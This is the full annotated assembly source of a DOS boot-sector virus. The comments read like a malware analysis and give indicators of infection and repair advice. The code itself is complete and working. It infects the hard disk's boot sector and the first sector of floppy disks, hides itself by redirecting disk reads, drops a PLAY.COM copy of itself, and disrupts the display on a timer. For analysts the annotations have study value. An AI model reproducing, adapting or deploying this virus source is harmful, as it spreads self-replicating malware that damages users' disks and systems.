DOS下的一个引导型病毒
;-----------------------------------------------------------------------
; Analysis notes. 16-bit real-mode x86, MASM syntax.
; One image, two entry paths, selected by the CS value at entry:
;   CS =  0 -> START : boot path (START assumes the image sits at 0000:7C00)
;   CS <> 0 -> FILE  : path taken when the image runs as a DOS program
; No ORG directive is visible, so every label is an offset from 0 in CSEG.
;-----------------------------------------------------------------------
CSEG SEGMENT
ASSUME CS:CSEG
BEGIN: MOV AX,CS
CMP AX,0 ; CS == 0 ?
JZ START ; yes: boot path
JMP FILE ; no: DOS-program path
;********************************** DATA
; Variables embedded in the code image; they travel with it wherever the
; image is copied or written.
DATE DB 00H ; receives DL after INT 1Ah/AH=04h in NEXT (RTC day of month, BCD); read by GR
PZ DB 77H ; marker byte: NEXT and FILE compare this offset against 77h to recognise the image
TIME DW 200H ; countdown decremented by NEW08 on every INT 08h
JMPA DW 7C00H ; far pointer 0000:7C00 (offset word here, segment word below)
DW 0000H
JMPN DW OFFSET NEXT ; far pointer 0020:NEXT = NEXT inside the copy at linear 00200h
DW 0020H
FN DB 'PLAY.COM',0 ; ASCIIZ file name handed to INT 21h/AH=3Ch by NEWF
;************************************
; START - boot-path entry (reached only when CS = 0).
; Zeroes DS/SS/ES, puts the stack at 0000:7C00, parks the current INT 08h
; vector in the INT 60h slot, copies 200h bytes of this image from
; 0000:7C00 to 0000:0200 and continues in that copy at 0020:NEXT.
; NOTE(review): linear 00200h-003FFh is the upper half of the interrupt
; vector table (vectors 80h-FFh); the copy overwrites those entries.
START: XOR AX,AX
MOV DS,AX
MOV SS,AX
MOV ES,AX
MOV SP,7C00H

MOV AX,DS:[20H] ; 0:20h = INT 08h vector, offset word (8*4)
MOV DS:[180H],AX ; 0:180h = INT 60h vector slot (60h*4): INT 60h now reaches the old INT 08h
MOV AX,DS:[22H] ; INT 08h vector, segment word
MOV DS:[182H],AX

MOV SI,SP ; source = 0000:7C00
MOV DI,0200H ; destination = 0000:0200
MOV CX,0200H ; 200h bytes = one 512-byte sector
CLD
REP MOVSB

MOV BX,OFFSET JMPN+7C00H ; JMPN as addressed in the copy still executing at 0000:7C00
JMP DWORD PTR CS:[BX] ; far jump through JMPN to 0020:NEXT

; NEXT - runs in the relocated copy (CS = 0020h; DS = ES = 0 from START).
;  1. Points the INT 08h vector at 0020:NEW08.
;  2. Reads C/H/S 0/0/1 of drive 80h into 0000:0600 and tests the marker
;     byte at offset PZ of that sector.
;  3. Marker absent: writes the sector just read to C/H/S 0/0/17h, then
;     writes the 200h-byte resident image over C/H/S 0/0/1.
;  4. Loads C/H/S 0/0/17h to 0000:7C00, stores the RTC day in DATE and
;     jumps to 0000:7C00.
; Indicators visible in this block: byte 77h at offset PZ of the first
; sector of drive 80h, and a copy of the previous first sector at
; cylinder 0, head 0, sector 17h (23 decimal).
NEXT: MOV AX,OFFSET NEW08 ; replace the INT 08h vector with 0020:NEW08
MOV DS:[20H],AX
MOV AX,0020H
MOV DS:[22H],AX

MOV BX,0600H ; ES:BX = 0000:0600 transfer buffer
MOV AX,0201H ; INT 13h AH=02h read, AL=1 sector
MOV CX,0001H ; cylinder 0, sector 1
MOV DX,0080H ; head 0, drive 80h (first hard disk)
INT 13H

CMP BYTE PTR ES:[PZ+0600H],077H ; marker already present in the sector just read?
JZ NC ; yes: skip both writes

MOV AX,0301H ; INT 13h AH=03h write, AL=1 sector
MOV CX,0017H ; cylinder 0, sector 17h: keep a copy of the sector just read
MOV DX,0080H
INT 13H

MOV SI,0200H ; resident image at 0000:0200 ...
MOV DI,0600H ; ... copied over the buffer
MOV CX,0200H
CLD
REP MOVSB

MOV AX,0301H ; write the buffer (BX still 0600h) to cylinder 0, sector 1
MOV CX,0001H
MOV DX,0080H
INT 13H

NC: MOV BX,7C00H ; ES:BX = 0000:7C00
MOV AX,0201H ; read the saved sector from cylinder 0, sector 17h
MOV CX,0017H
MOV DX,0080H
INT 13H

MOV AH,04H ; INT 1Ah AH=04h: read RTC date (DL = day, BCD)
INT 1AH

MOV CS:[DATE],DL ; remembered for the check in GR

MOV BX,OFFSET JMPA
JMP DWORD PTR CS:[BX] ; far jump to 0000:7C00, i.e. the sector loaded from sector 17h
;***********************************RUN HD BOOTER PRG
; NEW08 - first-stage INT 08h (timer tick) handler installed by NEXT.
; Counts TIME down from 200h; 512 ticks is roughly 28 s at the default
; 18.2 Hz tick rate. When the count reaches zero it:
;   - saves the current INT 13h vector into the INT 61h slot (0:184h),
;   - points INT 08h at GR, INT 13h at NEW13 and INT 25h at NEWF,
;     all in segment 0020h,
;   - reloads TIME with 200h.
; Every tick is passed on to the original handler through INT 60h.
; NOTE(review): the delay presumably lets DOS finish installing its own
; vectors first (INT 25h is a DOS service) - confirm.
; Indicators: INT 08h/13h/25h vectors pointing into segment 0020h, and
; INT 60h/61h slots holding the former INT 08h/INT 13h vectors.
NEW08: PUSH AX
PUSH DS

DEC CS:[TIME]
JNZ I08 ; not expired yet: just chain

XOR AX,AX
MOV DS,AX ; DS = 0 to address the vector table

MOV AX,DS:[4CH] ; 0:4Ch = INT 13h vector (13h*4)
MOV DS:[184H],AX ; 0:184h = INT 61h slot (61h*4)
MOV AX,DS:[4EH]
MOV DS:[186H],AX


MOV AX,OFFSET GR ; INT 08h -> GR (second-stage tick handler)
MOV DS:[20H],AX
MOV AX,OFFSET NEW13 ; INT 13h -> NEW13
MOV DS:[4CH],AX
MOV AX,OFFSET NEWF ; 0:94h = INT 25h vector (25h*4) -> NEWF
MOV DS:[94H],AX


MOV AX,0020H ; segment word for all three vectors
MOV DS:[22H],AX
MOV DS:[4EH],AX
MOV DS:[96H],AX

MOV CS:[TIME],200H

I08: POP DS
POP AX
INT 60H ; run the original INT 08h handler saved by START
IRET
;***************************************
; NEW13 - INT 13h (BIOS disk) hook installed by NEW08. The real handler
; is reached through INT 61h.
;   AH=03h (write) with DL=00h: before the caller's request is carried
;     out, one sector taken from CS:0000 (the resident image) is written
;     to drive 0, cylinder 0, head 0, sector 1. Nothing in this block
;     reads or keeps the sector that was there before.
;   AH=02h, or AH=03h with DL<>0: if the request targets DX=0080h and
;     CX=0001h (drive 80h, C/H/S 0/0/1) it is redirected to sector 17h,
;     the copy saved at infection time.
;   Any other function is passed through unchanged.
; Defender note: while this hook is resident, INT 13h reads of the first
; sector of drive 80h return the saved copy, and writes to it land on
; sector 17h. Inspect and repair only after booting from known-clean media.
; NOTE(review): each path ends in IRET, which reloads the caller's saved
; FLAGS, so the carry status from the real handler does not appear to
; reach the caller - confirm on a sample.
NEW13: CMP AH,02H ; read sectors?
JZ CNE
CMP AH,03H ; write sectors?
JNZ I13 ; neither: pass through
CMP DL,00H ; write to drive 0?
JNZ CNE ; other drive: only the redirect check applies

PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH ES

PUSH CS
POP ES ; ES:BX = CS:0000
MOV AX,0301H ; write 1 sector
XOR BX,BX
MOV CX,0001H ; cylinder 0, sector 1
MOV DX,BX ; head 0, drive 0
INT 61H ; via the original INT 13h
POP ES
POP DX
POP CX
POP BX
POP AX
JMP I13 ; then perform the caller's own request
CNE: CMP DX,0080H ; head 0, drive 80h?
JNZ I13
CMP CX,0001H ; cylinder 0, sector 1?
JNZ I13
MOV CX,0017H ; redirect to the saved copy at sector 17h

I13: INT 61H ; original INT 13h
IRET
;*******************************************
; NEWF - handler placed on the INT 25h vector (DOS absolute disk read)
; by NEW08. It does not perform the requested read. Instead it:
;   - creates the file named by FN ('PLAY.COM', no path) with attribute 01h,
;   - writes 400h bytes starting at CS:0000 to it,
;   - closes it, sets video mode 03h and ends the current DOS process
;     through NCF (INT 21h/AH=4Ch).
; With CS = 0020h the 400h bytes are linear 00200h-005FFh: the resident
; image followed by whatever lies in the next 200h bytes of low memory.
; The create call's error return is not checked before AX is used as a handle.
; Indicator: a read-only 1024-byte PLAY.COM appearing where a program
; issued INT 25h (presumably in the current directory - FN has no path).
NEWF: PUSH CS
POP DS ; DS = CS so DS:DX can address FN and the image
MOV DX,OFFSET FN
MOV CX,00000001B ; file attribute 01h = read-only
MOV AH,3CH ; INT 21h AH=3Ch: create file
INT 21H

MOV BX,AX ; handle returned by the create call
MOV AH,40H ; INT 21h AH=40h: write to handle
MOV CX,400H ; 400h bytes
XOR DX,DX ; from DS:0000
INT 21H

MOV AH,3EH ; INT 21h AH=3Eh: close handle in BX
INT 21H
MOV AX,0003H ; INT 10h AH=00h: set video mode 03h
INT 10H
JMP NCF ; terminate the current process

; GR - second-stage INT 08h handler, installed by NEW08 once TIME expires.
; On every timer tick it calls INT 10h/AH=09h to write one character 00h
; at the cursor position, then chains to the original handler via INT 60h.
;   DATE <> 15h: BX = 0007h (page 0, attribute 07h).
;   DATE =  15h: BX is left as the interrupted code had it, so page and
;                attribute are whatever happened to be in BX.
; DATE is the BCD day of month captured at boot, so 15h means the 15th.
; Visible symptom: the character under the cursor is overwritten each
; tick (00h presumably renders as a blank cell - confirm).
GR: PUSH AX
PUSH BX
PUSH CX

MOV AX,0900H ; AH=09h write char+attribute, AL=00h character
MOV CX,0001H ; repeat count 1

CMP CS:[DATE],15H ; booted on the 15th?
JZ GR1 ; yes: skip loading BX
MOV BX,111B ; BH = page 0, BL = attribute 07h
GR1: INT 10H

NG: POP CX ; NG is not referenced anywhere in the visible source
POP BX
POP AX
INT 60H ; original INT 08h handler
IRET
;************************************
; FILE - entry used when the image runs as a DOS program (CS <> 0).
;  1. Tests the marker byte at 0000:[200h+PZ], i.e. whether a relocated
;     copy already sits at linear 00200h; if so it exits at once.
;  2. Otherwise stores 77h there, reads C/H/S 0/0/1 of drive 80h into
;     CS:0300h and writes that sector to C/H/S 0/0/17h.
;  3. Copies 1B0h bytes from CS:0100h over the start of the buffer and
;     writes the buffer back to C/H/S 0/0/1.
;  4. Exits via INT 21h/AH=4Ch (NCF, also used by NEWF).
; Only the first 1B0h bytes of the sector are replaced; bytes
; 1B0h-1FFh keep the values read from disk.
; NOTE(review): unlike NEXT, this path checks only the in-memory marker,
; not the marker in the sector it reads. Sector 17h may therefore not
; hold a clean original; verify its content before using it for repair.
FILE: PUSH CS
POP ES ; ES = CS for the INT 13h buffer and the copy
XOR AX,AX
MOV DS,AX ; DS = 0 to reach low memory
CMP BYTE PTR DS:[200H+PZ],77H ; relocated copy present at 0000:0200?
JZ NCF ; yes: nothing to do

MOV AH,77H
MOV DS:[200H+PZ],AH ; set the marker byte in low memory
MOV BX,0300H ; ES:BX = CS:0300h buffer
MOV AX,0201H ; read 1 sector
MOV CX,0001H ; cylinder 0, sector 1
MOV DX,0080H ; head 0, drive 80h
INT 13H

MOV AX,0301H ; write the sector just read ...
MOV CX,0017H ; ... to cylinder 0, sector 17h
MOV DX,0080H
INT 13H

PUSH CS
POP DS
MOV SI,0100H ; CS:0100h - presumably the load address of this image as a .COM file; confirm
MOV DI,BX ; buffer at ES:0300h
MOV CX,01B0H ; 1B0h bytes only
CLD
REP MOVSB

MOV AX,0301H ; write the patched buffer to cylinder 0, sector 1
MOV CX,0001H
MOV DX,0080H
INT 13H

NCF: MOV AH,4CH ; INT 21h AH=4Ch: terminate process (AL is not set here)
INT 21H
CSEG ENDS
END BEGIN
